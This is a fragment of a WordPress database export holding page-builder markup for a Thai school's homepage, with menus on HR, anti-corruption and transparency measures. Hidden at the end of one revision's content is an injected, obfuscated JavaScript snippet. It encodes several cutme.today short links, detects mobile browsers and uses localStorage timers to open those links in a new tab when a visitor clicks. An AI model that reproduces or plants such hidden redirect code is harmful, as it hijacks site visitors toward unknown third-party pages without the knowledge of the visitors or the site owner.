{\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:51:06','2024-07-27 04:51:06','',14,'http://pakhaeng.ssk.in.th/?p=109',0,'revision','',0),
(110,1,'2024-07-27 11:53:09','2024-07-27 04:53:09','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 